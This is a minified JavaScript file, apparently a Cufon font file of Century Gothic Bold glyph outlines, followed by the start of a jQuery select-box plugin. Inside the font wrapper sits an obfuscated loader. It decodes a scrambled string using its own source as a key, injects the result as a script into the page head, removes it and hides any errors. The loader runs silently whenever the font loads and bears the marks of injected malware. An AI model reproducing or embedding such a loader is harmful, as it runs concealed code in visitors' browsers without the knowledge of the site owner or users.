r0,-47r-39,47r39,0xm85,7r110,-272r31,0r-111,272r-30,0xm48,-212v25,5,37,-26,14,-26v-8,0,-14,5,-18,13r-32,0v1,-52,92,-52,96,-5v0,11,-6,20,-17,26v50,22,17,78,-32,78v-29,0,-53,-18,-53,-46r33,0v0,25,44,24,44,3v0,-12,-12,-17,-35,-18r0,-25","w":302},{"d":"43,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0xm15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56","w":230},{"d":"27,-169v18,-64,87,-111,168,-91r-11,47v-47,-17,-89,12,-105,44r95,0r-7,29r-96,0v-1,10,-1,12,0,22r91,0r-7,29r-76,0v15,38,68,60,116,41r0,50v-80,20,-153,-26,-168,-91r-25,0r7,-29r13,0r0,-22r-20,0r7,-29r18,0"},{"d":"30,-259r49,0r0,212r71,0r0,47r-120,0r0,-259","w":158},{"d":"8,46r116,-312r34,0r-116,312r-34,0","w":165},{"d":"43,-279r53,-49r39,0r52,49r-52,0r-19,-23r-20,23r-53,0xm115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111","w":230},{"d":"37,-158v-36,-66,36,-132,105,-98v22,11,36,33,36,63r-50,0v-3,-38,-51,-33,-50,1v0,8,7,25,10,34r60,0r0,44r-47,0v5,28,1,39,-10,69v22,4,52,11,56,-14r45,0v-2,37,-29,66,-67,66v-32,0,-72,-14,-100,-1r-16,-42v10,-4,19,-7,28,-8v13,-21,18,-39,15,-70r-43,0r0,-44r28,0"},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm107,-347r42,69r-34,0r-65,-69r57,0","w":230},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm143,-347r42,69r-34,0r-65,-69r57,0","w":302},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm48,-49r33,18r-43,74r-24,-12","w":100},{"d":"101,-226v-20,1,-38,13,-37,34r-46,0v-1,-47,37,-78,85,-78v48,0,78,28,80,72v2,59,-67,59,-63,123r-47,0v-9,-53,37,-83,58,-110v14,-19,-5,-42,-30,-41xm67,-25v0,-16,14,-30,30,-30v18,0,31,14,31,30v1,15,-15,30,-30,30v-16,0,-31,-14,-31,-30"},{"d":"133,-267v78,0,135,56,135,134v0,78,-57,134,-135,134v-77,0,-134,-57,-134,-134v0,-77,57,-134,134,-134xm133,-27v60,0,105,-43,107,-105v2,-58,-49,-107,-106,-107v-58,0,-110,50,-108,106v2,61,46,106,107,106xm164,-59v-12,-24,8,-64,-28,-57r-26,0r0,57r-32,0r0,-147v52,2,120,-13,116,43v-1,19,-4,24,-17,33v25,5,6,62,24,71r-37,0xm163,-161v0,-24,-31,-15,-53,-17r0,35v23,-1,53,7,53,-18","w":266},{"d":"136,-259r169,0r0,49r-91,0r0,47r91,0r0,47r-91,0r0,68r91,0r0,48r-140,0r0,-53r-79,0r-25,53r-51,0xm165,-102r0,-113r-55,113r55,0","w":323},{"d":"59,-119v-19,1,-25,9,-41,20r0,-56v68,-47,120,53,181,-5r0,57v-48,32,-93,-7,-140,-16","w":216},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm107,-295r42,69r-34,0r-65,-69r57,0","w":230},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm48,-49r33,18r-43,74r-24,-12","w":100},{"d":"10,-127v0,-83,22,-138,90,-138v72,0,92,56,92,136v0,80,-19,136,-91,136v-71,0,-91,-53,-91,-134xm101,-39v55,5,48,-125,30,-160v-7,-14,-18,-19,-30,-19v-40,0,-42,42,-42,92v0,52,7,84,42,87"},{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58","w":158},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm91,-347r42,69r-34,0r-65,-69r57,0","w":187},{"d":"16,-98v-8,-82,97,-130,150,-72r0,-21r47,0r0,164v19,122,-169,134,-197,41r53,0v17,23,81,21,92,-5v3,-6,5,-18,5,-33v-52,56,-158,5,-150,-74xm168,-98v0,-30,-23,-53,-52,-53v-29,0,-52,23,-52,53v0,31,23,55,53,55v30,1,51,-24,51,-55","w":237},{"d":"20,-189r176,0r0,44r-176,0r0,-44xm20,-114r176,0r0,44r-176,0r0,-44","w":216},{"d":"189,-245v-36,43,-85,-8,-128,18r-19,-29v38,-40,87,11,128,-17xm15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56","w":230},{"d":"85,70r-77,0r0,-45r29,0r0,-245r-29,0r0,-45r77,0r0,335","w":115},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm59,-347r57,0r-65,69r-34,0","w":100},{"d":"30,-259r129,0r0,48r-80,0r0,47r80,0r0,48r-80,0r0,116r-49,0r0,-259","w":172},{"d":"82,-180v0,46,-1,66,38,69r0,42v-34,4,-41,22,-39,63v3,70,-17,86,-81,85r0,-42v27,-1,35,0,36,-25v0,-43,0,-88,33,-102v-32,-21,-32,-35,-33,-96v0,-29,-6,-30,-36,-30r0,-43v61,-1,82,15,82,79","w":122},{"d":"58,-265r45,0r-14,53r40,-38r20,39r-53,14r53,15r-23,38r-38,-38r13,53r-43,0r14,-53r-39,38r-24,-38r54,-15r-54,-15r24,-39r39,39","w":158},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88","w":302},{"d":"26,-265r49,0r0,189r-49,0r0,-189xm20,-25v0,-15,15,-30,30,-30v16,0,31,14,31,30v0,16,-15,30,-31,30v-15,0,-30,-15,-30,-30","w":100},{"d":"20,-194r0,-44r176,89r0,39r-176,90r0,-44r126,-65","w":216},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259","w":266},{"d":"16,-191r147,0r-86,150r81,0r0,41r-155,0r86,-151r-73,0r0,-40","w":165},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84xm113,-295r57,0r-65,69r-34,0","w":208},{"d":"196,-64r0,44r-176,-90r0,-39r176,-89r0,44r-125,65","w":216},{"d":"164,-192v0,36,-16,39,-42,68v21,25,35,40,41,46v4,-3,14,-11,29,-24r29,34r-27,24r42,44r-60,0r-17,-18v-54,39,-142,34,-142,-38v0,-38,19,-54,46,-76v-44,-47,-26,-113,38,-116v35,-2,63,26,63,56xm102,-203v-22,3,-19,27,-4,44v13,-11,20,-20,20,-29v0,-8,-7,-16,-16,-15xm63,-58v7,28,39,23,64,6v-9,-9,-22,-23,-38,-44v-17,14,-26,27,-26,38","w":244},{"d":"191,-75v0,49,-33,76,-89,75r-72,0r0,-259v75,-2,142,1,142,67v0,24,-10,38,-26,50v28,12,45,32,45,67xm125,-185v1,-23,-20,-29,-46,-27r0,55v26,1,46,-5,46,-28xm143,-77v0,-30,-27,-38,-64,-36r0,66v35,0,64,-1,64,-30","w":208},{"d":"30,-259r50,0r0,89r70,-89r59,0r-90,116r99,143r-59,0r-79,-115r0,115r-50,0r0,-259","w":223},{"d":"47,-226r53,-50r38,0r53,50r-53,0r-19,-23r-19,23r-53,0xm15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,261r-47,0r0,-90v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"78,-42v16,0,16,-13,16,-36r0,-181r49,0r0,172v16,104,-91,118,-136,56r35,-33v12,13,18,22,36,22","w":172},{"d":"67,75v-66,-87,-68,-260,0,-345r61,0v-39,44,-62,94,-62,171v0,81,21,123,62,174r-61,0","w":136},{"d":"79,-279r53,-49r39,0r52,49r-52,0r-19,-23r-20,23r-53,0xm17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88","w":302},{"d":"108,-103r-56,55r-26,-26r56,-55r-56,-56r26,-26r56,56r55,-56r26,26r-55,56r55,55r-26,26","w":216},{"d":"101,-150v-37,-16,-40,29,-40,73r0,77r-48,0r0,-191r41,0r0,24v9,-22,35,-37,62,-24","w":115},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152","w":216},{"d":"248,-126v0,87,-42,132,-146,126r-64,0r0,-115r-29,0r0,-29r29,0r0,-115r63,0v102,-4,147,44,147,133xm198,-127v0,-63,-38,-90,-110,-84r0,67r53,0r0,29r-53,0r0,67v72,5,110,-14,110,-79","w":267},{"d":"114,-152v-60,0,-38,90,-42,152r-48,0r0,-265r48,0r0,93v38,-42,122,-26,122,46r0,126r-47,0v-6,-56,20,-152,-33,-152","w":216},{"d":"137,-81v0,-39,-48,-55,-68,-25r-40,-9r31,-144r121,0r0,46r-84,0r-11,47v54,-14,99,30,99,83v0,72,-89,118,-145,71v-16,-13,-27,-30,-32,-52r52,0v13,39,77,28,77,-17"},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137","w":280},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm23,-23v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28","w":100},{"d":"221,-81v3,46,75,58,101,25r40,19v-21,41,-103,57,-144,23r0,14r-44,0r0,-24v-49,63,-167,13,-158,-71v-8,-81,108,-138,158,-71r0,-25r44,0r0,14v68,-48,168,2,157,96r-154,0xm327,-119v-8,-46,-95,-48,-104,0r104,0xm175,-97v0,-31,-23,-56,-55,-56v-31,0,-55,25,-55,58v0,31,23,56,55,56v34,0,55,-25,55,-58","w":388},{"d":"86,-151r0,-66r44,0r0,66r66,0r0,44r-66,0r0,66r-44,0r0,-66r-66,0r0,-44r66,0","w":216},{"d":"3,-191r47,0r38,109r42,-109r29,0r40,107r39,-107r47,0r-70,191r-30,0r-41,-109r-42,109r-30,0","w":287},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm108,-347r57,0r-65,69r-34,0","w":187},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm124,-295r57,0r-65,69r-34,0","w":230},{"d":"75,7r110,-272r30,0r-110,272r-30,0xm36,-262r47,0r0,133r-33,0r0,-105r-34,0xm240,-108v-12,0,-20,9,-20,21r-33,0v-4,-60,105,-65,105,-9v0,32,-28,49,-49,69r50,0r0,27r-110,0r0,-15v24,-25,65,-44,76,-79v-1,-9,-8,-14,-19,-14","w":302},{"d":"43,-30v-57,-62,-6,-166,75,-166v21,0,40,6,58,18r22,-25r22,20r-23,25v52,64,5,163,-79,163v-20,0,-37,-6,-53,-16r-23,26r-22,-19xm146,-144v-48,-27,-102,28,-72,79xm96,-45v47,22,92,-29,69,-77","w":237},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259","w":187},{"d":"129,0r-45,0r33,-96r-33,-95r45,0r32,95xm49,0r-45,0r33,-96r-33,-95r45,0r32,95","w":165},{"d":"4,-191r49,0r48,113r48,-113r49,0r-82,191r-31,0"},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm-21,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm57,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":86},{"d":"126,-193v2,-35,-53,-29,-58,-2r-47,0v4,-41,38,-70,80,-70v40,0,75,30,75,68v0,27,-16,45,-37,55v93,27,43,153,-41,149v-51,-2,-85,-35,-87,-85r48,0v4,23,16,40,42,39v21,0,41,-17,40,-38v-2,-27,-27,-43,-60,-42r0,-42v26,-2,43,-10,45,-32"},{"d":"143,-22v-12,35,-67,34,-79,1r0,91r-49,0r0,-261r49,0v5,60,-21,155,40,155v60,0,33,-97,39,-155r49,0r0,191r-49,0r0,-22","w":207},{"d":"101,-265v70,-6,101,85,53,125v22,14,37,36,37,67v0,50,-35,80,-90,80v-92,0,-116,-109,-54,-147v-47,-39,-18,-133,54,-125xm129,-189v0,-17,-12,-29,-30,-29v-16,0,-27,12,-27,29v0,15,13,29,28,29v17,0,29,-12,29,-29xm142,-76v0,-22,-19,-38,-41,-38v-22,0,-42,16,-42,37v0,21,20,37,42,37v24,0,40,-14,41,-36"},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"30,-265r77,0r0,45r-29,0r0,245r29,0r0,45r-77,0r0,-335","w":115},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84","w":208},{"d":"95,-318v0,-21,17,-39,38,-39v21,0,39,19,39,39v1,20,-18,39,-39,39v-21,0,-38,-18,-38,-39xm147,-319v0,-8,-7,-16,-14,-16v-7,0,-14,8,-14,16v0,8,7,16,14,16v7,0,14,-8,14,-16xm108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"43,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0xm114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0","w":230},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm117,-295r57,0r-65,69r-34,0","w":216},{"d":"67,-265v55,9,125,21,171,-5r35,0r-205,288r-35,0r175,-247v-27,5,-52,6,-81,4v16,43,-17,83,-58,83v-34,0,-63,-28,-62,-61v0,-36,27,-59,60,-62xm99,-203v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,14,29,30,29v16,0,30,-14,30,-29xm179,-55v0,-33,29,-62,61,-62v33,0,62,29,62,62v0,33,-29,62,-62,62v-33,0,-61,-29,-61,-62xm270,-55v0,-15,-15,-30,-30,-30v-15,0,-30,15,-30,30v0,15,15,30,30,30v15,0,30,-15,30,-30","w":309},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137xm125,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":280},{"d":"41,1v0,-46,0,-66,-39,-70r0,-42v35,-2,39,-22,39,-62v0,-70,17,-87,82,-86r0,43v-27,1,-37,-1,-36,25v0,44,-1,86,-33,102v31,22,31,35,32,96v0,30,8,28,37,30r0,42v-62,2,-82,-13,-82,-78","w":122},{"d":"54,-144v-54,-33,-26,-124,39,-121r0,-18r33,0r0,20v27,7,37,15,57,34r-34,33v-15,-16,-31,-24,-46,-24v-22,-1,-42,25,-23,40v41,33,117,36,113,107v-2,44,-25,72,-67,79r0,47r-33,0r0,-46v-38,-5,-59,-21,-81,-44r34,-35v21,23,42,35,62,35v27,1,49,-34,30,-57v-15,-18,-75,-39,-84,-50"},{"d":"30,-262r48,0r0,71r28,0r0,41r-28,0r0,150r-48,0r0,-150r-25,0r0,-41r25,0r0,-71","w":107},{"d":"115,-176r-28,0r-9,-89r47,0xm43,-176r-28,0r-10,-89r47,0","w":129},{"d":"31,-118r89,0r0,45r-89,0r0,-45","w":151},{"d":"13,-259r55,0r54,83r55,-83r55,0r-82,126r87,133r-55,0r-60,-91r-59,91r-56,0r88,-133","w":244},{"d":"26,-259r49,0r0,259r-49,0r0,-259","w":100},{"d":"222,-95v7,79,-97,133,-150,75r0,20r-48,0r0,-265r48,0r0,95v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"102,-265v70,0,96,75,62,141r-67,131r-42,-21r46,-88v-44,1,-79,-38,-79,-82v0,-44,37,-81,80,-81xm70,-184v0,19,13,35,33,35v19,0,33,-17,33,-35v1,-18,-15,-35,-33,-35v-18,0,-33,17,-33,35"},{"d":"16,-239v-1,-16,15,-31,31,-31v17,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-31,-14,-31,-31xm-15,30v20,10,38,6,38,-20r0,-201r48,0r0,197v5,59,-35,82,-86,62r0,-38","w":93},{"d":"37,-191r44,0r-32,96r32,95r-44,0r-33,-95xm116,-191r45,0r-32,96r32,95r-45,0r-32,-95","w":165},{"d":"70,-233r57,0r0,56r-57,0r0,-56xm11,-151r176,0r0,44r-176,0r0,-44xm70,-82r57,0r0,57r-57,0r0,-57","w":197},{"d":"222,-95v7,79,-97,133,-150,75r0,90r-48,0r0,-335r48,0r0,95v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100xm100,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":230},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm69,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm147,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":266},{"d":"192,-245v-36,43,-84,-8,-127,18r-19,-29v37,-40,86,11,128,-17xm15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"100,-219v-23,0,-37,20,-37,44r-48,0v1,-53,36,-90,89,-90v66,-1,99,67,68,126v-14,26,-51,67,-77,93r92,0r0,46r-179,0r0,-24v41,-51,116,-90,128,-161v3,-19,-17,-35,-36,-34"},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80","w":187},{"d":"59,-259r74,0r0,259r-49,0r0,-212r-53,0"},{"d":"15,-95v0,-83,98,-134,151,-75r0,-95r47,0r0,265r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111","w":230},{"d":"29,-259r50,0r0,98r87,0r0,-98r50,0r0,259r-50,0r0,-113r-87,0r0,113r-50,0r0,-259","w":244},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm-14,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm64,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":100},{"d":"153,-79v-1,-29,-21,-44,-51,-45r0,-43v44,7,52,-58,10,-59v-32,6,-40,25,-40,69r0,157r-48,0r0,-157v-2,-74,27,-109,90,-113v41,-2,76,28,75,66v-1,35,-21,52,-54,58v39,7,65,31,66,74v1,56,-53,91,-108,71r0,-45v27,17,61,-3,60,-33","w":216},{"d":"54,-259r49,0r59,181r61,-181r48,0r43,259r-47,0r-28,-163r-55,163r-44,0r-54,-163r-28,163r-48,0","w":323},{"d":"187,-184v-1,38,-20,58,-50,69r62,115r-54,0r-58,-110r-5,0r0,110r-49,0r0,-259v83,-3,155,-1,154,75xm139,-184v-1,-27,-25,-27,-57,-26r0,52v30,0,58,2,57,-26","w":208},{"d":"8,-202v-5,-45,42,-83,73,-50r0,-10r35,0r0,120r-35,0r0,-10v-31,31,-78,-6,-73,-50xm63,-171v26,-1,25,-62,0,-63v-25,0,-27,62,0,63","w":129},{"d":"195,-119r0,35r-40,0r-13,84r-35,0r12,-84r-34,0r-12,84r-35,0r12,-84r-39,0r0,-35r45,0r5,-33r-39,0r0,-35r44,0r11,-78r35,0r-11,78r33,0r12,-78r35,0r-11,78r35,0r0,35r-40,0r-5,33r35,0xm129,-152r-34,0r-4,33r33,0","w":216},{"d":"54,-161v-47,-32,-18,-109,46,-109v39,0,71,32,73,68r-46,0v-2,-25,-43,-34,-48,-10v17,48,104,51,103,117v0,28,-17,45,-38,54v18,16,28,29,30,57v3,57,-84,76,-121,42v-12,-11,-20,-28,-23,-50r45,0v3,26,48,32,51,5v-23,-47,-107,-50,-107,-119v-1,-26,16,-48,35,-55xm116,-60v35,-13,21,-41,-6,-60r-29,-20v-18,6,-29,29,-13,44v8,8,35,27,48,36"},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56","w":230},{"d":"87,-259r41,0r69,195r-43,0r-46,-132r-46,132r-43,0","w":216},{"d":"16,-259r156,0r-92,212r86,0r0,47r-158,0r92,-210r-84,0r0,-49","w":180},{"d":"190,46r-34,0r-116,-312r34,0","w":230}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-212-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})(".g}N7ebW?,6S._!0ae2zRgR6O#bN}e6SO#-z?,K^}$1k%uWiOcH@&g$!OcH@&gK!OcH@&g&zOcH@&g-eKN5N&[C8}$5N&[Ces$5N&[C9s$5N&[Ci&25N&[CB&#}YarG@%8KKOcH@&g%@%N5N&[C9%N5N&[Ci&iCYarG@%e2YarG@}[9,OcH@&gx5b>CYarG@}rCOaHCYarG@}[$YarG@},bYarG@%ebYarG@%rKYarG@}gx|OcH@&g&5b25N&[Ce&$5N&[C!%e$YarG@}r2YarG@}8}YarG@}8-YarG@%ubkOcH@&gxzOcH@&gbiX25N&[Ce%N5N&[C!s$CYarG@%,}YarG@},KYarG@%#bxOcH@&gb9OcH@&gHNXr}tOcH@&gR>OcH@&g&@OcH@&gxN-N5N&[CB&$5N&[C!bgCYarG@}gKYarG@}g&SOcH@&gx#Z25N&[Cisg!YarG@%8!YarG@}e}YarG@%8}C7$!YarG@%8bYarG@}[}YarG@%r9HOcH@&gR5ON5N&[C9&25N&[GC_[x2gcR-.X&bs*fK+rH$,O%}?7YaIZ)9i8B!e^;|~yk=SQ@5zuWN#>tvP016J{Ce%e=YarG@%e$YarG@}8KYarR@%,b&O_6YarG@}g-YarG@%rbYarG@}[!YarG@}[-YarGub#H{OcH@&g2!OcH@&g&#Z!5N&[C!s[k@YN5N&[C8sgY6OcH@&g%NO$5N&[C8}x}6.B19*BvPOcH@&g}B*_}_+N5N&[C!&^2..25N&[CBb25N&[CBb>-SOcH@&gf@?[$[s!5N&[C!bi=>OcH@&g&vOcH@&g%uOcH@&g-BOcH@&g%tK$5N&[Ci%^}YarG@},%uOcH@&gRNsg27I$5N&[C8b$5N&[C!%$5N&[Ce%+$YarG@%ua0-cKYR!5N&[C9}29-%8!~OcH@&g2iOcH@&g%>OcH@&g}!OcH@&gH>OcH@&g&WOcH@&gHu&!&5}2$ROcH@&gbeOcH@&gKer$-YarG@%,x8OcH@&gx>7Nv?O2@iX^b@7g!W._Ri.+5|*rGkY[NiX^Gk7[N@Xe5!7eaW?_5^*,RS}iv^7c!@?c&6I>W0?,%;%ivQ?uWQOi){s^a>aN@S.r1;*u|i7#!1%e6|Y^}1%e6|O_v@ac5!aeK87Ob1%e6|O_v!I,$#?,$>}g$u?,aSO_v87#W|-_6|X^K!Y>f;7g68%OK|7#tS?g6uagv97,H|.,}QYi)0?r5kszky?+!^,#b7?$Na*OC7?$N6.+)|")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":201,"face":{"font-family":"Century Gothic","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 7 2 2 2 2 2 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-29 -357 375.836 79.1703","underline-thickness":"32.3438","underline-position":"-16.875","unicode-range":"U+0020-U+20AC"}}));;(function($){var jQselectable=function(select,options,temp){this.conf={style:'selectable',set:'show',out:'hide',setDuration:'normal',outDuration:'normal',opacity:1,top:0,left:0,callback:null}
this.temp={selectable:'<div class="sctble_cont"/>',simpleBox:'<div class="simple_cont"/>'}
$.extend(this.conf,options||{});$.extend(this.temp,temp||{});this.target=$(select);this.attrs={id:this.target.attr('id'),cl:this.target.attr('class')}
this.generatedFlg=false;this.init();}
jQselectable.prototype={init:function(){this.build();this.bind_events();this.generatedFlg=true;},rebuild:function(){this.m_input.unbind();this.mat.unbind();$('a',this.mat).unbind();$('label[for="'+this.attrs.id+'"]').unbind();this.build();this.bind_events();},build:function(){var has_optgroup=$('optgroup',this.target).length>0?true:false;var _this=this;var generate_anchors=function(obj,parent){var _a=$('<a/>');$(parent).append(_a);_a.text(obj.text()).attr({href:'#'+encodeURI(obj.text()),name:obj.val()});if(obj.is(':selected')){_this.m_text.text(obj.text());_a.addClass('selected');}
if(obj.hasClass('br')){_a.after('<br/>');}}
if(!this.m_input){this.m_input=$('<a/>');this.m_text=$('<span/>');var _style=this.conf.style.match(/simple/)?'sBox':'sctble';this.m_input.append(this.m_text).attr({id:this.attrs.id+'_dammy',href:'#'}).addClass('sctble_display').addClass(_style).addClass(this.attrs.cl).insertAfter(this.target);this.target.hide();this.mat=$('<div/>');if(_style=='simple'){this.mat.append(this.temp.selectable);}else{this.mat.append(this.temp.simpleBox);}
this.mat.attr({id:this.attrs.id+'_mat'}).addClass(_style).addClass(this.attrs.cl);}
if(this.generatedFlg){this.mat.empty();if(_style=='simple'){this.mat.append(this.temp.selectable);}else{this.mat.append(this.temp.simpleBox);}}
this._div=$('<div class="body"/>');if(has_optgroup){this.mat.addClass('otpgroup');var _optgroup=$('optgroup',this.target);var _option=[];for(var i=0;i<_optgroup.length;i++){_option[i]=$('option',_optgroup[i]);}
